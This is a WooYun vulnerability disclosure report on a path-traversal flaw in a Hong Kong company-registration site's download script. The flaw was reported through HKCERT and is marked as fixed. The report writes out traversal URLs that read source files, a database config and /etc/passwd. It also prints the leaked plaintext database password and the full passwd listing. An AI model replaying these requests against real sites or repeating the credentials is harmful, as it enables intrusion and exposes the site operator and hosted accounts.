当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166913

漏洞标题:Download Vulnerability of Hong Kong & China company formation and registration services(香港地區)

相关厂商:Hong Kong & China company formation and registration services

漏洞作者: j0k3r

提交时间:2016-01-04 15:57

修复时间:2016-02-02 09:28

公开时间:2016-02-02 09:28

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态: 已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-04: 细节已通知厂商并且等待厂商处理中
2016-01-07: 厂商已经确认,细节仅向厂商公开
2016-01-17: 细节向核心白帽子及相关领域专家公开
2016-01-27: 细节向普通白帽子公开
2016-02-02: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

rt

详细说明:

目标:http://**.**.**.**
物理路径:/home/sinovant/public_html/download.php
构造,

http://**.**.**.**/download.php?file=../../../public_html/download.php


下载配置文件,

http://**.**.**.**/download.php?file=../../../public_html/config/dbconnect.php


dbconnect.php中

$db = mysqli_connect("localhost","sinovant_sino","5geHX-rf6s4T", "sinovant_en");


/etc/passwd下载,

http://**.**.**.**/download.php?file=../../../../../etc/passwd


passwd中,

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:499:499::/etc/abrt:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
nslcd:x:65:55:LDAP Client User:/:/sbin/nologin
saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:497:493:MySQL server:/var/lib/mysql:/bin/bash
cpanelhorde:x:500:500::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:496:492:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
cpanel:x:32001:502::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32002:503::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32003:504::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32004:505::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
mailman:x:32005:506::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
cpanellogin:x:32007:509::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell
cpaneleximfilter:x:32008:510::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
cpaneleximscanner:x:32009:511::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell
cpses:x:495:491::/var/cpanel/cpses:/sbin/nologin
clamav:x:32010:512::/home/clamav:/sbin/nologin
glamor:x:503:515::/home/glamor:/usr/local/cpanel/bin/noshell
dashan:x:504:516::/home/dashan:/bin/false
globexas:x:505:517::/home/globexas:/usr/local/cpanel/bin/noshell
aaguangz:x:506:518::/home/aaguangz:/usr/local/cpanel/bin/noshell
venezuel:x:509:521::/home/venezuel:/usr/local/cpanel/bin/noshell
vzcom:x:512:524::/home/vzcom:/usr/local/cpanel/bin/noshell
fasunshi:x:513:525::/home/fasunshi:/usr/local/cpanel/bin/noshell
wemakew:x:515:527::/home/wemakew:/usr/local/cpanel/bin/noshell
wt24:x:516:528::/home/wt24:/usr/local/cpanel/bin/noshell
xdmotion:x:517:529::/home/xdmotion:/usr/local/cpanel/bin/noshell
xouweich:x:518:530::/home/xouweich:/usr/local/cpanel/bin/noshell
ygagolf:x:521:533::/home/ygagolf:/usr/local/cpanel/bin/noshell
bmlond:x:524:536::/home/bmlond:/usr/local/cpanel/bin/noshell
innova:x:526:538::/home/innova:/usr/local/cpanel/bin/noshell
tectonic:x:527:539::/home/tectonic:/usr/local/cpanel/bin/noshell
theonech:x:528:540::/home/theonech:/usr/local/cpanel/bin/noshell
therainb:x:529:541::/home/therainb:/usr/local/cpanel/bin/noshell
titletra:x:532:544::/home/titletra:/usr/local/cpanel/bin/noshell
bcnlisti:x:536:548::/home/bcnlisti:/usr/local/cpanel/bin/noshell
linkesp:x:538:550::/home/linkesp:/usr/local/cpanel/bin/noshell
cnftmsgl:x:540:552::/home/cnftmsgl:/usr/local/cpanel/bin/noshell
ricard:x:544:556::/home/ricard:/usr/local/cpanel/bin/noshell
proandre:x:548:560::/home/proandre:/usr/local/cpanel/bin/noshell
daanaa:x:550:562::/home/daanaa:/usr/local/cpanel/bin/noshell
intws:x:551:563::/home/intws:/usr/local/cpanel/bin/noshell
bassetti:x:553:565::/home/bassetti:/usr/local/cpanel/bin/noshell
schoolof:x:554:566::/home/schoolof:/bin/false
riviera:x:555:567::/home/riviera:/usr/local/cpanel/bin/noshell
goodplus:x:559:571::/home/goodplus:/usr/local/cpanel/bin/noshell
movieb:x:562:574::/home/movieb:/usr/local/cpanel/bin/noshell
oscarfu:x:563:575::/home/oscarfu:/usr/local/cpanel/bin/noshell
khtcn:x:564:576::/home/khtcn:/usr/local/cpanel/bin/noshell
sinoh:x:565:577::/home/sinoh:/usr/local/cpanel/bin/noshell
amwh:x:568:580::/home/amwh:/usr/local/cpanel/bin/noshell
horses:x:571:583::/home/horses:/usr/local/cpanel/bin/noshell
avateq:x:575:587::/home/avateq:/usr/local/cpanel/bin/noshell
procuras:x:579:591::/home/procuras:/usr/local/cpanel/bin/noshell
brockhou:x:583:595::/home/brockhou:/usr/local/cpanel/bin/noshell
deltatra:x:585:597::/home/deltatra:/bin/false
cafejoya:x:586:598::/home/cafejoya:/usr/local/cpanel/bin/noshell
blacksin:x:589:601::/home/blacksin:/usr/local/cpanel/bin/noshell
cxtcl:x:595:607::/home/cxtcl:/usr/local/cpanel/bin/noshell
delidelu:x:596:608::/home/delidelu:/usr/local/cpanel/bin/noshell
displayw:x:599:611::/home/displayw:/usr/local/cpanel/bin/noshell
everbl:x:603:615::/home/everbl:/usr/local/cpanel/bin/noshell
gfacn:x:604:616::/home/gfacn:/usr/local/cpanel/bin/noshell
harvest:x:606:618::/home/harvest:/usr/local/cpanel/bin/noshell
imeicana:x:611:623::/home/imeicana:/usr/local/cpanel/bin/noshell
investhu:x:612:624::/home/investhu:/usr/local/cpanel/bin/noshell
more:x:619:631::/home/more:/usr/local/cpanel/bin/noshell
newgr:x:620:632::/home/newgr:/usr/local/cpanel/bin/noshell
ofasia:x:622:634::/home/ofasia:/usr/local/cpanel/bin/noshell
starh:x:631:643::/home/starh:/usr/local/cpanel/bin/noshell
superpr:x:635:647::/home/superpr:/usr/local/cpanel/bin/noshell
sinohost:x:638:650::/home/sinohost:/usr/local/cpanel/bin/noshell
sinoprep:x:639:651::/home/sinoprep:/usr/local/cpanel/bin/noshell
sinosem:x:640:652::/home/sinosem:/usr/local/cpanel/bin/noshell
bvi:x:641:653::/home/bvi:/usr/local/cpanel/bin/noshell
meenaefi:x:644:656::/home/meenaefi:/usr/local/cpanel/bin/noshell
mychinab:x:645:657::/home/mychinab:/usr/local/cpanel/bin/noshell
chinetog:x:648:660::/home/chinetog:/usr/local/cpanel/bin/noshell
sinovant:x:649:661::/home/sinovant:/usr/local/cpanel/bin/noshell
sookstv:x:651:663::/home/sookstv:/usr/local/cpanel/bin/noshell
perspect:x:652:664::/home/perspect:/usr/local/cpanel/bin/noshell
isaisr:x:656:668::/home/isaisr:/usr/local/cpanel/bin/noshell
trcsd:x:659:671::/home/trcsd:/usr/local/cpanel/bin/noshell
longan:x:661:673::/home/longan:/usr/local/cpanel/bin/noshell
primobik:x:664:676::/home/primobik:/usr/local/cpanel/bin/noshell
chinaweb:x:667:679::/home/chinaweb:/usr/local/cpanel/bin/noshell
alex:x:669:681::/home/alex:/usr/local/cpanel/bin/noshell
mnopal:x:671:683::/home/mnopal:/usr/local/cpanel/bin/noshell
afrosh:x:672:684::/home/afrosh:/usr/local/cpanel/bin/noshell
crystalv:x:673:685::/home/crystalv:/usr/local/cpanel/bin/noshell
coffeema:x:675:687::/home/coffeema:/usr/local/cpanel/bin/noshell
mcit:x:677:689::/home/mcit:/usr/local/cpanel/bin/noshell
nihaopul:x:679:691::/home/nihaopul:/usr/local/cpanel/bin/noshell
sekomlan:x:687:699::/home/sekomlan:/usr/local/cpanel/bin/noshell
triangle:x:689:701::/home/triangle:/usr/local/cpanel/bin/noshell
sinocate:x:691:703::/home/sinocate:/usr/local/cpanel/bin/noshell
sinodom:x:692:704::/home/sinodom:/usr/local/cpanel/bin/noshell
soucysha:x:694:706::/home/soucysha:/usr/local/cpanel/bin/noshell
dmse:x:695:707::/home/dmse:/usr/local/cpanel/bin/noshell
float:x:700:712::/home/float:/usr/local/cpanel/bin/noshell
boxandpa:x:703:715::/home/boxandpa:/usr/local/cpanel/bin/noshell
sigmanes:x:704:716::/home/sigmanes:/usr/local/cpanel/bin/noshell
tivesto:x:707:719::/home/tivesto:/usr/local/cpanel/bin/noshell
cpanelrrdtool:x:32011:720::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell
epiquewi:x:708:721::/home/epiquewi:/usr/local/cpanel/bin/noshell
cpanelconnecttrack:x:32012:722::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell
business:x:709:723::/home/business:/usr/local/cpanel/bin/noshell
ma:x:32013:32013::/home/ma:/bin/bash
hossanna:x:711:725::/home/hossanna:/usr/local/cpanel/bin/noshell
editingt:x:712:726::/home/editingt:/usr/local/cpanel/bin/noshell
grooveen:x:713:727::/home/grooveen:/usr/local/cpanel/bin/noshell
officeac:x:714:728::/home/officeac:/usr/local/cpanel/bin/noshell

漏洞证明:

1.png


2.png


部分url,

http://**.**.**.**/download.php?file=../../../public_html/index.php
http://**.**.**.**/download.php?file=../../../public_html/download.php
http://**.**.**.**/download.php?file=../../../public_html/config/dbconnect.php
http://**.**.**.**/download.php?file=../../../public_html/admin/login.php
http://**.**.**.**/download.php?file=../../../../../etc/passwd
……


dbconnect.php中,

$db = mysqli_connect("localhost","sinovant_sino","5geHX-rf6s4T", "sinovant_en");


passwd中,

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:499:499::/etc/abrt:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
nslcd:x:65:55:LDAP Client User:/:/sbin/nologin
saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:497:493:MySQL server:/var/lib/mysql:/bin/bash
cpanelhorde:x:500:500::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:496:492:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
cpanel:x:32001:502::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32002:503::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32003:504::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32004:505::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
mailman:x:32005:506::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
cpanellogin:x:32007:509::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell
cpaneleximfilter:x:32008:510::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
cpaneleximscanner:x:32009:511::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell
cpses:x:495:491::/var/cpanel/cpses:/sbin/nologin
clamav:x:32010:512::/home/clamav:/sbin/nologin
glamor:x:503:515::/home/glamor:/usr/local/cpanel/bin/noshell
dashan:x:504:516::/home/dashan:/bin/false
globexas:x:505:517::/home/globexas:/usr/local/cpanel/bin/noshell
aaguangz:x:506:518::/home/aaguangz:/usr/local/cpanel/bin/noshell
venezuel:x:509:521::/home/venezuel:/usr/local/cpanel/bin/noshell
vzcom:x:512:524::/home/vzcom:/usr/local/cpanel/bin/noshell
fasunshi:x:513:525::/home/fasunshi:/usr/local/cpanel/bin/noshell
wemakew:x:515:527::/home/wemakew:/usr/local/cpanel/bin/noshell
wt24:x:516:528::/home/wt24:/usr/local/cpanel/bin/noshell
xdmotion:x:517:529::/home/xdmotion:/usr/local/cpanel/bin/noshell
xouweich:x:518:530::/home/xouweich:/usr/local/cpanel/bin/noshell
ygagolf:x:521:533::/home/ygagolf:/usr/local/cpanel/bin/noshell
bmlond:x:524:536::/home/bmlond:/usr/local/cpanel/bin/noshell
innova:x:526:538::/home/innova:/usr/local/cpanel/bin/noshell
tectonic:x:527:539::/home/tectonic:/usr/local/cpanel/bin/noshell
theonech:x:528:540::/home/theonech:/usr/local/cpanel/bin/noshell
therainb:x:529:541::/home/therainb:/usr/local/cpanel/bin/noshell
titletra:x:532:544::/home/titletra:/usr/local/cpanel/bin/noshell
bcnlisti:x:536:548::/home/bcnlisti:/usr/local/cpanel/bin/noshell
linkesp:x:538:550::/home/linkesp:/usr/local/cpanel/bin/noshell
cnftmsgl:x:540:552::/home/cnftmsgl:/usr/local/cpanel/bin/noshell
ricard:x:544:556::/home/ricard:/usr/local/cpanel/bin/noshell
proandre:x:548:560::/home/proandre:/usr/local/cpanel/bin/noshell
daanaa:x:550:562::/home/daanaa:/usr/local/cpanel/bin/noshell
intws:x:551:563::/home/intws:/usr/local/cpanel/bin/noshell
bassetti:x:553:565::/home/bassetti:/usr/local/cpanel/bin/noshell
schoolof:x:554:566::/home/schoolof:/bin/false
riviera:x:555:567::/home/riviera:/usr/local/cpanel/bin/noshell
goodplus:x:559:571::/home/goodplus:/usr/local/cpanel/bin/noshell
movieb:x:562:574::/home/movieb:/usr/local/cpanel/bin/noshell
oscarfu:x:563:575::/home/oscarfu:/usr/local/cpanel/bin/noshell
khtcn:x:564:576::/home/khtcn:/usr/local/cpanel/bin/noshell
sinoh:x:565:577::/home/sinoh:/usr/local/cpanel/bin/noshell
amwh:x:568:580::/home/amwh:/usr/local/cpanel/bin/noshell
horses:x:571:583::/home/horses:/usr/local/cpanel/bin/noshell
avateq:x:575:587::/home/avateq:/usr/local/cpanel/bin/noshell
procuras:x:579:591::/home/procuras:/usr/local/cpanel/bin/noshell
brockhou:x:583:595::/home/brockhou:/usr/local/cpanel/bin/noshell
deltatra:x:585:597::/home/deltatra:/bin/false
cafejoya:x:586:598::/home/cafejoya:/usr/local/cpanel/bin/noshell
blacksin:x:589:601::/home/blacksin:/usr/local/cpanel/bin/noshell
cxtcl:x:595:607::/home/cxtcl:/usr/local/cpanel/bin/noshell
delidelu:x:596:608::/home/delidelu:/usr/local/cpanel/bin/noshell
displayw:x:599:611::/home/displayw:/usr/local/cpanel/bin/noshell
everbl:x:603:615::/home/everbl:/usr/local/cpanel/bin/noshell
gfacn:x:604:616::/home/gfacn:/usr/local/cpanel/bin/noshell
harvest:x:606:618::/home/harvest:/usr/local/cpanel/bin/noshell
imeicana:x:611:623::/home/imeicana:/usr/local/cpanel/bin/noshell
investhu:x:612:624::/home/investhu:/usr/local/cpanel/bin/noshell
more:x:619:631::/home/more:/usr/local/cpanel/bin/noshell
newgr:x:620:632::/home/newgr:/usr/local/cpanel/bin/noshell
ofasia:x:622:634::/home/ofasia:/usr/local/cpanel/bin/noshell
starh:x:631:643::/home/starh:/usr/local/cpanel/bin/noshell
superpr:x:635:647::/home/superpr:/usr/local/cpanel/bin/noshell
sinohost:x:638:650::/home/sinohost:/usr/local/cpanel/bin/noshell
sinoprep:x:639:651::/home/sinoprep:/usr/local/cpanel/bin/noshell
sinosem:x:640:652::/home/sinosem:/usr/local/cpanel/bin/noshell
bvi:x:641:653::/home/bvi:/usr/local/cpanel/bin/noshell
meenaefi:x:644:656::/home/meenaefi:/usr/local/cpanel/bin/noshell
mychinab:x:645:657::/home/mychinab:/usr/local/cpanel/bin/noshell
chinetog:x:648:660::/home/chinetog:/usr/local/cpanel/bin/noshell
sinovant:x:649:661::/home/sinovant:/usr/local/cpanel/bin/noshell
sookstv:x:651:663::/home/sookstv:/usr/local/cpanel/bin/noshell
perspect:x:652:664::/home/perspect:/usr/local/cpanel/bin/noshell
isaisr:x:656:668::/home/isaisr:/usr/local/cpanel/bin/noshell
trcsd:x:659:671::/home/trcsd:/usr/local/cpanel/bin/noshell
longan:x:661:673::/home/longan:/usr/local/cpanel/bin/noshell
primobik:x:664:676::/home/primobik:/usr/local/cpanel/bin/noshell
chinaweb:x:667:679::/home/chinaweb:/usr/local/cpanel/bin/noshell
alex:x:669:681::/home/alex:/usr/local/cpanel/bin/noshell
mnopal:x:671:683::/home/mnopal:/usr/local/cpanel/bin/noshell
afrosh:x:672:684::/home/afrosh:/usr/local/cpanel/bin/noshell
crystalv:x:673:685::/home/crystalv:/usr/local/cpanel/bin/noshell
coffeema:x:675:687::/home/coffeema:/usr/local/cpanel/bin/noshell
mcit:x:677:689::/home/mcit:/usr/local/cpanel/bin/noshell
nihaopul:x:679:691::/home/nihaopul:/usr/local/cpanel/bin/noshell
sekomlan:x:687:699::/home/sekomlan:/usr/local/cpanel/bin/noshell
triangle:x:689:701::/home/triangle:/usr/local/cpanel/bin/noshell
sinocate:x:691:703::/home/sinocate:/usr/local/cpanel/bin/noshell
sinodom:x:692:704::/home/sinodom:/usr/local/cpanel/bin/noshell
soucysha:x:694:706::/home/soucysha:/usr/local/cpanel/bin/noshell
dmse:x:695:707::/home/dmse:/usr/local/cpanel/bin/noshell
float:x:700:712::/home/float:/usr/local/cpanel/bin/noshell
boxandpa:x:703:715::/home/boxandpa:/usr/local/cpanel/bin/noshell
sigmanes:x:704:716::/home/sigmanes:/usr/local/cpanel/bin/noshell
tivesto:x:707:719::/home/tivesto:/usr/local/cpanel/bin/noshell
cpanelrrdtool:x:32011:720::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell
epiquewi:x:708:721::/home/epiquewi:/usr/local/cpanel/bin/noshell
cpanelconnecttrack:x:32012:722::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell
business:x:709:723::/home/business:/usr/local/cpanel/bin/noshell
ma:x:32013:32013::/home/ma:/bin/bash
hossanna:x:711:725::/home/hossanna:/usr/local/cpanel/bin/noshell
editingt:x:712:726::/home/editingt:/usr/local/cpanel/bin/noshell
grooveen:x:713:727::/home/grooveen:/usr/local/cpanel/bin/noshell
officeac:x:714:728::/home/officeac:/usr/local/cpanel/bin/noshell

修复方案:

..

版权声明:转载请注明来源 j0k3r@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-01-07 18:23

厂商回复:

已將事件通知有關機構

最新状态:

2016-02-02:相關機構回報已修復漏洞